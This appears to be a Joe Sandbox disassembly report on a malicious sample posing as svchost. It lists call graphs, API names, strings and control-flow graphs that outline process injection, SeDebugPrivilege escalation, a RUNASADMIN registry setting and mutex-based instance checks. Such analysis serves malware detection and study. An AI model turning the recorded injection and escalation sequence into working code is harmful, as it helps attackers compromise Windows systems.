9552->9557 9553->9551 9555 1800088b0 69 API calls __InternalCxxFrameHandler 9555->9557 9556->9554 9557->9548 9557->9552 9557->9555 9558 180008914 _SetImageBase 69 API calls 9557->9558 9558->9557 9337 18000641c DeleteCriticalSection 9338 18000643d 9337->9338 9339 180006438 9337->9339 9340 1800073d4 free 69 API calls 9339->9340 9340->9338 9559 18000be9c 9561 18000bed9 _IsNonwritableInCurrentImage __C_specific_handler 9559->9561 9562 18000bfb0 9559->9562 9560 18000bf7b RtlUnwindEx 9560->9561 9561->9560 9561->9562 9344 18000e920 9345 18000a148 _getptd 69 API calls 9344->9345 9346 18000e958 9345->9346 9347 18000a148 _getptd 69 API calls 9346->9347 9348 18000e969 9347->9348 9349 18000a148 _getptd 69 API calls 9348->9349 9350 18000e9a8 9349->9350 9351 18000a148 _getptd 69 API calls 9350->9351 9352 18000e9b4 9351->9352 9353 18000a148 _getptd 69 API calls 9352->9353 9354 18000e9c0 9353->9354 9367 18000880c 9354->9367 9357 18000a148 _getptd 69 API calls 9358 18000e9f3 __CxxCallCatchBlock 9357->9358 9374 180008850 9358->9374 9361 18000a148 _getptd 69 API calls 9362 18000eae6 9361->9362 9363 18000a148 _getptd 69 API calls 9362->9363 9365 18000eaf2 9363->9365 9366 18000ead3 __DestructExceptionObject 9366->9361 9368 18000a148 _getptd 69 API calls 9367->9368 9369 18000881d 9368->9369 9370 18000882b 9369->9370 9371 18000a148 _getptd 69 API calls 9369->9371 9372 18000a148 _getptd 69 API calls 9370->9372 9371->9370 9373 18000883f 9372->9373 9373->9357 9373->9358 9375 18000a148 _getptd 69 API calls 9374->9375 9376 180008862 9375->9376 9377 180008870 9376->9377 9378 18000f180 _inconsistency 74 API calls 9376->9378 9379 18000a148 _getptd 69 API calls 9377->9379 9378->9377 9380 180008875 9379->9380 9381 18000888c 9380->9381 9383 18000889c 9380->9383 9382 18000f180 _inconsistency 74 API calls 9381->9382 9384 180008891 9382->9384 9385 18000a148 _getptd 69 API calls 9383->9385 9384->9366 9386 1800088e0 9384->9386 9385->9384 9387 18000a148 _getptd 69 API calls 9386->9387 9388 1800088ee 9387->9388 9388->9366 9389 180014a1f 9390 18000a148 _getptd 69 API calls 9389->9390 9391 180014a2d 9390->9391 9392 180014a3b 9391->9392 9393 18000a148 _getptd 69 API calls 9391->9393 9393->9392 9400 18000ea27 9401 18000a148 _getptd 69 API calls 9400->9401 9404 18000ea34 __DestructExceptionObject 9401->9404 9402 18000ea7b RaiseException 9403 18000eaa2 9402->9403 9405 180008850 __CxxCallCatchBlock 74 API calls 9403->9405 9404->9402 9409 18000eaaa 9405->9409 9406 18000ead3 __DestructExceptionObject 9407 18000a148 _getptd 69 API calls 9406->9407 9408 18000eae6 9407->9408 9410 18000a148 _getptd 69 API calls 9408->9410 9409->9406 9411 1800088e0 __CxxCallCatchBlock 69 API calls 9409->9411 9412 18000eaf2 9410->9412 9411->9406 9416 180007c30 9419 18000c7b8 9416->9419 9420 18000f39c _lock 69 API calls 9419->9420 9421 18000c7cb 9420->9421 9425 1800073d4 free 69 API calls 9421->9425 9426 18000c80f 9421->9426 9427 18000c7ff 9421->9427 9424 1800073d4 free 69 API calls 9424->9426 9425->9427 9428 18000f584 LeaveCriticalSection 9426->9428 9427->9424 9429 180001130 9430 180001145 9429->9430 9431 18000116f 9429->9431 9436 180004120 9430->9436 9444 1800010b0 9431->9444 9434 180001166 9437 18000413d 9436->9437 9438 1800041a1 9437->9438 9439 180004245 9437->9439 9443 1800041b9 _UnwindNestedFrames 9438->9443 9448 180004ba0 9438->9448 9440 180006310 _DllMainCRTStartup 71 API calls 9439->9440 9441 180004251 9440->9441 9443->9434 9445 1800010cb std::_System_error_category::default_error_condition 9444->9445 9446 180004120 71 API calls 9445->9446 9447 180001104 9446->9447 9449 180004bd4 9448->9449 9450 180004c25 9449->9450 9451 180007e98 _DllMainCRTStartup 71 API calls 9449->9451 9453 180004c32 _UnwindNestedFrames 9449->9453 9452 1800062cc std::_Xbad_alloc 2 API calls 9450->9452 9450->9453 9451->9450 9452->9453 9453->9443 9568 180004db0 9569 180004e18 9568->9569 9570 180006310 _DllMainCRTStartup 71 API calls 9569->9570 9571 180004e24 9570->9571 9572 180014daf 9573 180014dc8 9572->9573 9574 1800083a8 _CxxThrowException 2 API calls 9573->9574 9575 180014dee 9574->9575 9576 1800146b4 9577 18000c1e8 fclose LeaveCriticalSection 9576->9577 9578 1800146c6 9577->9578 9579 1800065b4 HeapAlloc 9580 180012ab8 9581 180012af9 9580->9581 9582 180012ace 9580->9582 9583 18000f39c _lock 69 API calls 9582->9583 9584 180012ad8 9583->9584 9585 18000930c _updatetlocinfoEx_nolock 69 API calls 9584->9585 9586 180012ae8 9585->9586 9588 18000f584 LeaveCriticalSection 9586->9588 9589 1800061b8 9590 180008b98 std::exception::exception 69 API calls 9589->9590 9591 1800061c6 9590->9591 9592 1800031bd 9593 1800031d0 9592->9593 9594 180006bc0 setSBUpLow 9 API calls 9593->9594 9595 18000324e 9594->9595 9596 180002cc0 9597 180001450 _DllMainCRTStartup 88 API calls 9596->9597 9598 180002cd0 Sleep 9597->9598 9609 1800027c0 9598->9609 9600 180002d01 9602 180001450 _DllMainCRTStartup 88 API calls 9600->9602 9603 180002d0d CreateThread 9602->9603 9605 180001450 _DllMainCRTStartup 88 API calls 9603->9605 9604 180002ced Sleep 9606 1800027c0 107 API calls 9604->9606 9607 180002d38 9605->9607 9608 180002ce0 9606->9608 9608->9600 9608->9604 9630 180001eb0 9608->9630 9610 180002808 9609->9610 9611 1800027fe 9609->9611 9646 1800017d0 9610->9646 9614 180006bc0 setSBUpLow 9 API calls 9611->9614 9615 180002a16 9614->9615 9615->9608 9617 18000282e 9664 180004750 9617->9664 9619 18000288c 9675 180004620 9619->9675 9621 1800028a3 9688 180006050 9621->9688 9624 180004120 71 API calls 9625 1800028f8 9624->9625 9698 180005400 9625->9698 9628 180002955 9628->9611 9629 180002969 ReleaseMutex ReleaseMutex CloseHandle CloseHandle 9628->9629 9629->9611 9631 1800018f0 72 API calls 9630->9631 9632 180001f2e sprintf 9631->9632 9633 180006e38 sprintf 93 API calls 9632->9633 9634 180001f68 9633->9634 9635 180006050 93 API calls 9634->9635 9636 180001f7d 9635->9636 9637 180004120 71 API calls 9636->9637 9638 180001fb9 9637->9638 9639 180005400 71 API calls 9638->9639 9640 180001fc9 OpenMutexA GetLastError OpenMutexA GetLastError 9639->9640 9641 180002038 ReleaseMutex CloseHandle ReleaseMutex CloseHandle 9640->9641 9642 18000201e 9640->9642 9643 18000202d 9641->9643 9642->9641 9642->9643 9644 180006bc0 setSBUpLow 9 API calls 9643->9644 9645 1800020d2 9644->9645 9645->9608 9647 180004120 71 API calls 9646->9647 9648 180001814 9647->9648 9649 180001853 LocalAlloc 9648->9649 9650 1800018d0 9648->9650 9649->9650 9651 180001871 WideCharToMultiByte 9649->9651 9655 1800018f0 9650->9655 9652 1800018aa 9651->9652 9652->9652 9653 180004120 71 API calls 9652->9653 9654 1800018c7 LocalFree 9653->9654 9654->9650 9656 180004120 71 API calls 9655->9656 9657 180001947 sprintf 9656->9657 9658 180001965 GetComputerNameA 9657->9658 9659 180001983 9658->9659 9660 180004120 71 API calls 9659->9660 9661 1800019a9 9660->9661 9662 180006bc0 setSBUpLow 9 API calls 9661->9662 9663 1800019bc 9662->9663 9663->9617 9665 18000476d 9664->9665 9666 180004881 9665->9666 9667 1800047db 9665->9667 9668 180006310 _DllMainCRTStartup 71 API calls 9666->9668 9669 1800047f7 9667->9669 9670 18000488d 9667->9670 9674 18000480b _UnwindNestedFrames 9667->9674 9668->9670 9672 180004ba0 71 API calls 9669->9672 9669->9674 9671 180006310 _DllMainCRTStartup 71 API calls 9670->9671 9673 18000489a 9671->9673 9672->9674 9674->9619 9676 18000464e 9675->9676 9677 180004720 9675->9677 9679 18000466c 9676->9679 9680 18000472c 9676->9680 9678 180006348 _DllMainCRTStartup 71 API calls 9677->9678 9678->9680 9682 180004688 9679->9682 9683 180004739 9679->9683 9687 180004699 _UnwindNestedFrames 9679->9687 9681 180006310 _DllMainCRTStartup 71 API calls 9680->9681 9681->9683 9685 180004ba0 71 API calls 9682->9685 9682->9687 9684 180006310 _DllMainCRTStartup 71 API calls 9683->9684 9686 180004746 9684->9686 9685->9687 9687->9621 9689 1800060a0 9688->9689 9689->9689 9706 180005510 9689->9706 9691 1800060b6 9712 180005620 9691->9712 9693 1800060c8 9695 180006100 9693->9695 9720 180006e38 9693->9720 9696 180006bc0 setSBUpLow 9 API calls 9695->9696 9697 1800028c1 9696->9697 9697->9624 9699 18000544e 9698->9699 9703 18000545c 9698->9703 9699->9703 9759 180004970 9699->9759 9700 180004750 71 API calls 9702 18000548c 9700->9702 9704 180004620 71 API calls 9702->9704 9703->9700 9705 180002906 OpenMutexA GetLastError OpenMutexA GetLastError 9704->9705 9705->9628 9705->9629 9707 18000554b 9706->9707 9710 1800055c8 9707->9710 9731 180005730 9707->9731 9709 18000559e 9709->9710 9711 180005730 9 API calls 9709->9711 9710->9691 9710->9710 9711->9709 9713 180005650 9712->9713 9713->9713 9714 180005510 9 API calls 9713->9714 9715 1800056ac 9714->9715 9716 180005510 9 API calls 9715->9716 9717 1800056bf 9716->9717 9717->9717 9718 180006bc0 setSBUpLow 9 API calls 9717->9718 9719 180005715 9718->9719 9719->9693 9721 180006e6b sprintf 9720->9721 9722 180006e70 9721->9722 9724 180006e8a 9721->9724 9723 18000a3c8 _errno 69 API calls 9722->9723 9725 180006e75 9723->9725 9735 18000a814 9724->9735 9727 180008f70 _invalid_parameter_noinfo 17 API calls 9725->9727 9729 180006e80 9727->9729 9729->9693 9730 18000a438 _flsbuf 88 API calls 9730->9729 9732 180005780 9731->9732 9732->9732 9733 180006bc0 setSBUpLow 9 API calls 9732->9733 9734 180006030 9733->9734 9734->9709 9736 180006be0 _LocaleUpdate::_LocaleUpdate 69 API calls 9735->9736 9737 18000a87a 9736->9737 9738 18000a3c8 _errno 69 API calls 9737->9738 9739 18000a87f 9738->9739 9740 18000b1df 9739->9740 9742 18000c824 _fileno 69 API calls 9739->9742 9757 18000a8ac sprintf std::exception::_Copy_str 9739->9757 9741 18000a3c8 _errno 69 API calls 9740->9741 9743 18000b1e4 9741->9743 9742->9757 9745 180008f70 _invalid_parameter_noinfo 17 API calls 9743->9745 9744 18000b1ef 9746 180006bc0 setSBUpLow 9 API calls 9744->9746 9745->9744 9747 180006eb3 9746->9747 9747->9729 9747->9730 9748 18001145c _isleadbyte_l 69 API calls 9748->9757 9749 180011380 88 API calls write_char 9749->9757 9750 1800073d4 free 69 API calls 9750->9757 9751 18000adc9 DecodePointer 9751->9757 9752 18000bd9c _malloc_crt 69 API calls 9752->9757 9753 18000b234 88 API calls write_multi_char 9753->9757 9754 1800113c8 88 API calls write_string 9754->9757 9755 18000ae1e DecodePointer 9755->9757 9756 18000ae3e DecodePointer 9756->9757 9757->9740 9757->9744 9757->9748 9757->9749 9757->9750 9757->9751 9757->9752 9757->9753 9757->9754 9757->9755 9757->9756 9758 18001168c 71 API calls sprintf 9757->9758 9758->9757 9760 18000498a 9759->9760 9761 180004a2e 9759->9761 9763 180004ba0 71 API calls 9760->9763 9765 1800049a3 _UnwindNestedFrames 9760->9765 9762 180006310 _DllMainCRTStartup 71 API calls 9761->9762 9764 180004a3a 9762->9764 9763->9765 9765->9703 9458 180010948 9459 180006be0 _LocaleUpdate::_LocaleUpdate 69 API calls 9458->9459 9460 1800109ae 9459->9460 9461 18000a3c8 _errno 69 API calls 9460->9461 9462 1800109b3 9461->9462 9463 18001131f 9462->9463 9466 18000c824 _fileno 69 API calls 9462->9466 9471 1800109e0 sprintf std::exception::_Copy_str 9462->9471 9464 18000a3c8 _errno 69 API calls 9463->9464 9468 180011338 9463->9468 9465 18001132d 9464->9465 9467 180008f70 _invalid_parameter_noinfo 17 API calls 9465->9467 9466->9471 9467->9468 9469 180006bc0 setSBUpLow 9 API calls 9468->9469 9470 180011362 9469->9470 9471->9463 9471->9468 9472 18001145c _isleadbyte_l 69 API calls 9471->9472 9473 180011380 88 API calls write_char 9471->9473 9474 180010f09 DecodePointer 9471->9474 9475 1800073d4 free 69 API calls 9471->9475 9476 1800113c8 88 API calls write_string 9471->9476 9477 18001168c 71 API calls sprintf 9471->9477 9478 18000bd9c _malloc_crt 69 API calls 9471->9478 9479 180010f5e DecodePointer 9471->9479 9480 180010f7e DecodePointer 9471->9480 9481 18000b234 88 API calls write_multi_char 9471->9481 9472->9471 9473->9471 9474->9471 9475->9471 9476->9471 9477->9471 9478->9471 9479->9471 9480->9471 9481->9471 9482 180014a48 LeaveCriticalSection 9766 1800076c8 9767 18000bd1c _calloc_crt 69 API calls 9766->9767 9768 1800076db EncodePointer 9767->9768 9769 1800076fa 9768->9769 9487 180014f4c 9490 180006380 9487->9490 9491 18000639b sprintf 9490->9491 9492 1800063e1 GetLastError 9491->9492 9493 18000640c 9491->9493 9492->9493 9770 180014cd0 9771 180014d01 9770->9771 9772 180014cec 9770->9772 9773 180014cf7 9772->9773 9774 180007e98 _DllMainCRTStartup 71 API calls 9772->9774 9773->9771 9775 1800062cc std::_Xbad_alloc 2 API calls 9773->9775 9774->9773 9775->9771 9494 180007b54 DecodePointer 9495 180007b6a 9494->9495 9496 18000ba70 _NMSG_WRITE 69 API calls 9495->9496 9497 180007b76 _set_abort_behavior 9496->9497 9498 18000c6e0 abort 73 API calls 9497->9498 9499 180007b87 9498->9499 9776 1800065d4 9777 1800065ec 9776->9777 9778 1800065dd HeapFree 9776->9778 9778->9777 9500 180014755 9503 180008714 9500->9503 9504 18000a148 _getptd 69 API calls 9503->9504 9505 180008739 9504->9505 9506 18000a148 _getptd 69 API calls 9505->9506 9507 180008748 9506->9507 9508 18000ed0c __InternalCxxFrameHandler 79 API calls 9507->9508 9509 180008783 9508->9509 9510 18000a148 _getptd 69 API calls 9509->9510 9511 180008788 9510->9511
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleSleep$FileMutexReleasememchr$CopyCreateDeleteProcessTerminateThread_wcsftime_lfclosewcsstr
                                                      • String ID: !!3$"C:\Program Files (x86)\Internet Explorer\ExtExport.exe"$%d$2222$3-2$3-3$3-4$3-5$3vp7f92rfoeq$>>>$Expl$SysWOW64$\SysWOW64$orer$rb+$string too long
                                                      • API String ID: 1372095089-3246744611
                                                      • Opcode ID: a144ad47c439805c793284aa70ae503fd3b9680167d1c7f0d7e8e273856873b8
                                                      • Instruction ID: fe6398e0846a3c1e750943485bf1fe51f28c9368799a8c22a16bf7b62420f632
                                                      • Opcode Fuzzy Hash: a144ad47c439805c793284aa70ae503fd3b9680167d1c7f0d7e8e273856873b8
                                                      • Instruction Fuzzy Hash: 1A62CE32604A8889FB93CF25D8413ED37A5F7597E8F448216FA5A47AE9DF34C688C340

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 256 1800067ac-1800067ca 257 180006a65-180006a68 256->257 258 1800067d0-1800067d9 256->258 260 180006a6a-180006a85 OutputDebugStringW 257->260 261 180006a8b-180006aa0 257->261 258->257 259 1800067df-1800067e8 258->259 259->257 262 1800067ee-18000682f 259->262 260->261 263 180006835-18000686b VirtualAllocEx 262->263 264 180006a36-180006a3b 262->264 265 180006871-1800068f3 WriteProcessMemory 263->265 266 180006a60 263->266 264->257 267 1800068f9-180006917 WriteProcessMemory 265->267 268 180006a3d-180006a42 265->268 266->257 267->268 270 18000691d-18000693d WriteProcessMemory 267->270 269 180006a47 268->269 271 180006a4c-180006a5e VirtualFreeEx 269->271 270->268 272 180006943-180006979 WriteProcessMemory 270->272 271->257 272->271 273 18000697f-1800069a3 VirtualProtectEx 272->273 274 180006aa1-180006aa6 273->274 275 1800069a9-1800069b8 273->275 274->269 276 180006aa8-180006ab0 275->276 277 1800069be-1800069c6 275->277 279 180006ab2-180006ab8 276->279 280 180006afd-180006b02 276->280 277->271 278 1800069cc-1800069d2 277->278 283 1800069d4-1800069da 278->283 284 1800069dc-180006a14 CreateRemoteThread 278->284 281 180006b07-180006b0d 279->281 282 180006aba-180006ad3 Wow64GetThreadContext 279->282 280->271 288 180006b77-180006b88 ResumeThread WaitForSingleObject 281->288 289 180006b0f-180006b29 GetThreadContext 281->289 285 180006b65 282->285 286 180006ad9-180006afb Wow64SetThreadContext 282->286 283->284 287 180006a1a-180006a31 WaitForSingleObject CloseHandle 283->287 284->287 290 180006b5b-180006b60 284->290 294 180006b6a-180006b71 285->294 291 180006b4f-180006b59 286->291 292 180006b8e-180006b95 287->292 288->292 289->285 293 180006b2b-180006b49 SetThreadContext 289->293 290->271 291->294 292->271 293->291 294->271 294->288
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$ContextMemoryProcessWrite$Virtual$ObjectSingleWaitWow64$AllocCloseCreateDebugFreeHandleOutputProtectRemoteResumeString
                                                      • String ID:
                                                      • API String ID: 2704266222-0
                                                      • Opcode ID: 566d3de7a8aa8f922ccdf83bc4f164a0abd4f00b1abb1b6ecbb5eee3bb1cb91f
                                                      • Instruction ID: 48a320c14681a11773e42cba07975039505394bec5cfcad3e3eb669fb640e2ea
                                                      • Opcode Fuzzy Hash: 566d3de7a8aa8f922ccdf83bc4f164a0abd4f00b1abb1b6ecbb5eee3bb1cb91f
                                                      • Instruction Fuzzy Hash: 2FA17F72704B8482EBA2DF11E84039A77A5F789BC4F54C125EE8957BA8DF3DC649CB01

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 368 1800024d0-180002509 369 180002510-180002522 368->369 369->369 370 180002524-18000252f 369->370 371 180002530-180002538 370->371 371->371 372 18000253a-180002571 FindFirstFileA 371->372 373 180002577-180002596 call 180007d50 call 180007b3c FindNextFileA 372->373 374 180002789-1800027b2 call 180006bc0 372->374 373->374 381 18000259c-1800025ab 373->381 382 1800025b0-1800025c0 381->382 383 1800025c2-1800025c8 382->383 384 1800025ce-1800025d4 382->384 383->384 385 18000276b-18000277b FindNextFileA 383->385 386 1800025d6-1800025dc 384->386 387 1800025ef-180002638 call 180008d00 wsprintfA call 1800023e0 384->387 385->382 390 180002781 385->390 386->387 388 1800025de-1800025e9 386->388 387->385 394 18000263e-18000264c call 1800020f0 387->394 388->385 388->387 390->374 396 180002651-180002653 394->396 396->385 397 180002659-180002685 call 180008d00 396->397 400 180002687-18000268c 397->400 401 1800026e8-1800026f1 call 180006ef0 397->401 403 180002690-1800026e0 400->403 404 1800026f6-18000271d call 180007b10 401->404 403->403 405 1800026e2-1800026e6 403->405 404->385 408 18000271f-180002732 call 18000c750 404->408 405->404 408->385 411 180002734-18000273b 408->411 412 180002740-18000274c 411->412 413 180002756-180002769 call 18000c750 412->413 414 18000274e-180002752 412->414 413->385 413->390 414->412 415 180002754 414->415 415->385
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileFind$Next$First_time64wsprintf
                                                      • String ID: %s\%s$C:\Windows\SysWOW64$\*.exe$cmd.exe$eyoorun.exe$svchost.exe
                                                      • API String ID: 1338143221-945379052
                                                      • Opcode ID: 05e6296f7022ad60ad3b34706873424fd7d325c3f60632fcd9d34c1757ac244c
                                                      • Instruction ID: 863ca3a4a7715c7dae77e164a0577798d1b5151542436b42e0dde00baaeda3ca
                                                      • Opcode Fuzzy Hash: 05e6296f7022ad60ad3b34706873424fd7d325c3f60632fcd9d34c1757ac244c
                                                      • Instruction Fuzzy Hash: 5F818631208EC995EBA7DB29E8143E9B7A1FB5E7C4F44D111FA8942695EF39C349C700

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Resource$AllocFindLoadLockSizeofVirtual
                                                      • String ID: RESD
                                                      • API String ID: 2160097198-3593919488
                                                      • Opcode ID: 21ba1f57fe0ff2532fdd8ce493f4bfc310ef08f41bf5d9194ceb8acc0d49e603
                                                      • Instruction ID: 755cd4d83b62b81cda5f700b88cc98866fe539ecaa23f45409046d2e84f7a741
                                                      • Opcode Fuzzy Hash: 21ba1f57fe0ff2532fdd8ce493f4bfc310ef08f41bf5d9194ceb8acc0d49e603
                                                      • Instruction Fuzzy Hash: 9A116D31712B8481EFD7CB16A81439A67A1EB4CFC0F088436ED0E47B65EE38CA598700

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 3038321057-2896544425
                                                      • Opcode ID: cb934724524889619ee85fd417e9e10cd1c19fd43cf88e6a624b0549bbaf769e
                                                      • Instruction ID: 4a4d0bcc5021dd84a9b9fd0f06170f536b472f24006b546454631718155e06c9
                                                      • Opcode Fuzzy Hash: cb934724524889619ee85fd417e9e10cd1c19fd43cf88e6a624b0549bbaf769e
                                                      • Instruction Fuzzy Hash: E0010976515F8582EB52DB50F81938AB7A0F78DB94F815016FA8A03728DF3DC20CCB00

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mutex$CloseCreateErrorHandleLastLocalOpenReleasesprintf$AllocByteCharComputerFreeMultiNameWide_errno_invalid_parameter_noinfo
                                                      • String ID: %s$%s@!%s$aba.#h7*83#.(om
                                                      • API String ID: 3800965093-2428214157
                                                      • Opcode ID: 413cd086f97a7dfdeca0f93bcd52b8ebf499f4cabfbbe0178fda36436d7e863f
                                                      • Instruction ID: c12e6893bc04c646664e2919d067745ebb5e196151121e6cc137700703bcd157
                                                      • Opcode Fuzzy Hash: 413cd086f97a7dfdeca0f93bcd52b8ebf499f4cabfbbe0178fda36436d7e863f
                                                      • Instruction Fuzzy Hash: 20618C32604B88C6FB52DF65E8443CE77B1F789794F508126FA8A53AA9CF39C648C740

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mutex$CloseErrorHandleLastOpenReleasesprintf$ComputerName_errno_invalid_parameter_noinfo
                                                      • String ID: %s%s$13a.$83y.$dh74
                                                      • API String ID: 4133063299-3485211351
                                                      • Opcode ID: dbe6c626c3480dc245ab38091f056625d80df6b733eebe0fde8e11a796b0c5d2
                                                      • Instruction ID: 2874ade4f15da250015a476398c5eb14234b2bf6d31506aa08b3fc76c7029bd5
                                                      • Opcode Fuzzy Hash: dbe6c626c3480dc245ab38091f056625d80df6b733eebe0fde8e11a796b0c5d2
                                                      • Instruction Fuzzy Hash: 6C51B332A14B848AF792CB64E4443CE77B1F7887D4F508225FA9E57AA9CF78C649C740

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressCloseCurrentHandleModuleOpenProcProcessValue
                                                      • String ID: IsWow64Process$RUNASADMIN$Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers$kernel32
                                                      • API String ID: 329719994-3841156478
                                                      • Opcode ID: 2d5683601c1b20c0f960e93eee74cc609262a46b97175e5ec50ba63b32fce81c
                                                      • Instruction ID: cdeb3a2e714b38da8e323a6adf53a10610d26db7d72f9741ef6b4653cdc9832a
                                                      • Opcode Fuzzy Hash: 2d5683601c1b20c0f960e93eee74cc609262a46b97175e5ec50ba63b32fce81c
                                                      • Instruction Fuzzy Hash: 73211C31714B8486EB52DB15F88439A73A1F78DBD4F849125FA9E47B68DF38C249CB00

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
